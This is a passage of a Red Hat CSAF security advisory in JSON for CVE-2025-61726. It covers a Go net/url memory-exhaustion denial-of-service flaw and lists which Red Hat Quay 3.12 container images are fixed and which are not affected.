"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x as a component of Red Hat Quay 3.12",
"product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x"
},
"product_reference": "registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"relates_to_product_reference": "Red Hat Quay 3.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64 as a component of Red Hat Quay 3.12",
"product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64"
},
"product_reference": "registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"relates_to_product_reference": "Red Hat Quay 3.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64 as a component of Red Hat Quay 3.12",
"product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64"
},
"product_reference": "registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"relates_to_product_reference": "Red Hat Quay 3.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le as a component of Red Hat Quay 3.12",
"product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le"
},
"product_reference": "registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64 as a component of Red Hat Quay 3.12",
"product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"relates_to_product_reference": "Red Hat Quay 3.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x as a component of Red Hat Quay 3.12",
"product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"relates_to_product_reference": "Red Hat Quay 3.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le as a component of Red Hat Quay 3.12",
"product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64 as a component of Red Hat Quay 3.12",
"product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"relates_to_product_reference": "Red Hat Quay 3.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64 as a component of Red Hat Quay 3.12",
"product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"relates_to_product_reference": "Red Hat Quay 3.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64 as a component of Red Hat Quay 3.12",
"product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"relates_to_product_reference": "Red Hat Quay 3.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64 as a component of Red Hat Quay 3.12",
"product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64"
},
"product_reference": "registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"relates_to_product_reference": "Red Hat Quay 3.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64 as a component of Red Hat Quay 3.12",
"product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"relates_to_product_reference": "Red Hat Quay 3.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x as a component of Red Hat Quay 3.12",
"product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"relates_to_product_reference": "Red Hat Quay 3.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le as a component of Red Hat Quay 3.12",
"product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64 as a component of Red Hat Quay 3.12",
"product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"relates_to_product_reference": "Red Hat Quay 3.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64 as a component of Red Hat Quay 3.12",
"product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"relates_to_product_reference": "Red Hat Quay 3.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x as a component of Red Hat Quay 3.12",
"product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"relates_to_product_reference": "Red Hat Quay 3.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le as a component of Red Hat Quay 3.12",
"product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64 as a component of Red Hat Quay 3.12",
"product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"relates_to_product_reference": "Red Hat Quay 3.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64 as a component of Red Hat Quay 3.12",
"product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"relates_to_product_reference": "Red Hat Quay 3.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x as a component of Red Hat Quay 3.12",
"product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"relates_to_product_reference": "Red Hat Quay 3.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64 as a component of Red Hat Quay 3.12",
"product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"relates_to_product_reference": "Red Hat Quay 3.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le as a component of Red Hat Quay 3.12",
"product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64 as a component of Red Hat Quay 3.12",
"product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64"
},
"product_reference": "registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64",
"relates_to_product_reference": "Red Hat Quay 3.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64 as a component of Red Hat Quay 3.12",
"product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"relates_to_product_reference": "Red Hat Quay 3.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64 as a component of Red Hat Quay 3.12",
"product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64"
},
"product_reference": "registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"relates_to_product_reference": "Red Hat Quay 3.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le as a component of Red Hat Quay 3.12",
"product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x as a component of Red Hat Quay 3.12",
"product_id": "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x",
"relates_to_product_reference": "Red Hat Quay 3.12"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-61726",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:42.791305+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434432"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: net/url: Memory exhaustion in query parameter parsing in net/url",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker must be able to send a specially crafted HTTP request to an application parsing URL-encoded forms with net/url, specifically a request containing a large number of unique query parameters. The request will cause the application to consume an excessive amount of memory and eventually result in a denial of service, with no impact to confidentiality or integrity. Due to this reason, this vulnerability has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "RHBZ#2434432",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434432"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61726",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61726"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://go.dev/cl/736712",
"url": "https://go.dev/cl/736712"
},
{
"category": "external",
"summary": "https://go.dev/issue/77101",
"url": "https://go.dev/issue/77101"
},
{
"category": "external",
